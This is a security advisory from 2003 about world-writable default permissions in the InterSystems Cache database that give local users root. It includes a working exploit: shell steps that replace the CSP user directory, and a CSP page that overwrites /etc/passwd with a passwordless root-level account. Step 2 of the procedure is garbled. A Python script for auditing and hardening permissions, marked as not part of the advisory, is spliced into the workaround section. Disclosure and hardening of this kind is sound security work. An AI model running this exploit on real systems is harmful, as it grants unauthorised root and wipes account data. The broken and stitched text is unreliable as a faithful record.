Title: Cache Database Poor File Permissions Lead To Local Root
Date: March 11, 2003

I. BACKGROUND

"Cache', the post-relational database for e-applications, is optimized for the tougher demands of Web applications. It delivers breakthrough performance for massively scalable Web applications. Its rapid application development environment with advanced object technology lets you operate at Internet speed. Cache's ultra-fast SQL outperforms relational systems 20X. And its multidimensional application and data server delivers lightning-fast performance." (http://www.intersystems.com)

II. DESCRIPTION

The default installation of the Cache database yields poorly protected files and directories in the main package tree. Directories and files are open to all users for read, write and execute.

III. ANALYSIS

Local attackers can exploit this to manipulate directories and binaries inside the installation tree. This may be used by a local malicious user to gain root access. The content in /cachesys/csp/user is executed as root through the web interface. The parent directory of user (csp) is world writeable, allowing a local non-root user to move user aside, copy its contents, and create a new writeable user directory.

  1. mv /cachesys/csp/user /cachesys/csp/user.old
  2. cp -rp /cachesys/csp/user /cachesys/csp/user.old
  3. cp cspexp.csp /cachesys/csp/user
  4. lynx http://localhost/csp/user/cspexp.csp
  5. su - cache

<------------------cspexp.csp------------->

Intersystems Cache' local root exploit. Larry W. Cashdollar http://vapid.dhs.org

Because of poor default file and directory permissions a local user can execute code as root via the Cache CSP interpreter.


Attempting to overwrite /etc/passwd with cache::0:0:root:/root:/bin/bash.

<script language=Cache runat=server>

     Set cdef=##class(%Library.File).%New("/etc/passwd")
     Do cdef.Open("WSN")
     Do cdef.WriteLine("cache::0:0:root:/root:/bin/bash")
     Do cdef.%Close()

</script>

<----------------snip-------------->

IV. DETECTION

Cache' Database 5.0 is affected. http://www.intersystems.com

V. WORKAROUND

An administrator could possibly change the file permissions to something more restrictive that would not allow any user to manipulate data in the Cache installation directory. I do not know what effect this would have on the Cache' database functionality.
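As an added illustration of that workaround (not part of the advisory), the script below walks an installation tree, reports every non-symlink entry that carries the world-write bit, and can strip that bit (chmod o-w) from the findings. The /cachesys/csp/user layout it builds is a constructed sample in a temporary directory; the function names are mine.

```python
import os
import stat
import tempfile


def find_world_writable(root):
    """Return sorted (path, mode, sticky) tuples for entries under root
    that any user may write to. Symlinks are skipped because their own
    mode bits are meaningless; sticky directories are flagged so the
    reviewer can treat /tmp-style directories differently."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for entry in [dirpath] + [os.path.join(dirpath, f) for f in filenames]:
            st = os.lstat(entry)
            if stat.S_ISLNK(st.st_mode):
                continue
            if st.st_mode & stat.S_IWOTH:
                sticky = stat.S_ISDIR(st.st_mode) and bool(st.st_mode & stat.S_ISVTX)
                findings.append((entry, stat.S_IMODE(st.st_mode), sticky))
    return sorted(findings)


def remove_other_write(paths, apply=False):
    """Plan (and with apply=True perform) chmod o-w on each path.
    Returns (path, old_mode, new_mode) so a dry run can be reviewed first."""
    plan = []
    for path in paths:
        mode = stat.S_IMODE(os.lstat(path).st_mode)
        new_mode = mode & ~stat.S_IWOTH
        plan.append((path, mode, new_mode))
        if apply and new_mode != mode:
            os.chmod(path, new_mode)
    return plan


def demo():
    """Build a constructed tree with the advisory's weak permissions, audit it,
    harden it, and audit again. Returns (findings_before, findings_after)."""
    base = tempfile.mkdtemp()          # mkdtemp creates the base as 0700
    cachesys = os.path.join(base, "cachesys")
    csp = os.path.join(cachesys, "csp")
    user = os.path.join(csp, "user")
    os.makedirs(user)
    page = os.path.join(user, "index.csp")
    with open(page, "w") as fh:
        fh.write("<!-- constructed sample page -->\n")
    os.chmod(cachesys, 0o755)          # sane parent, so only csp/ and below are reported
    for p, m in ((csp, 0o777), (user, 0o777), (page, 0o666)):
        os.chmod(p, m)                 # the world-writable defaults the advisory describes
    before = find_world_writable(base)
    remove_other_write([p for p, _, _ in before], apply=True)
    return before, find_world_writable(base)


if __name__ == "__main__":
    for path, mode, sticky in demo()[0]:
        print(f"{oct(mode)} {'(sticky) ' if sticky else ''}{path}")
```

Run it against a real tree with find_world_writable("/cachesys") and review the dry-run plan from remove_other_write before passing apply=True, since the advisory itself notes the effect on Cache functionality is unknown.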

VI. VENDOR FIX

http://www.intersystems.com/support/flash/index.html

VII. CVE INFORMATION

The Mitre Corp.'s Common Vulnerabilities and Exposures (CVE) Project has assigned the following identification numbers to these issues:

CVE IDS:
  CVE-2003-0497  overwrite Cache using setuid cuxs program
  CVE-2003-0498  code injection into /cachesys/csp

VIII. REFERENCES

http://www.idefense.com/advisory/07.01.03.txt

IX. CREDIT

Larry W. Cashdollar (http://vapid.dhs.org) discovered this vulnerability.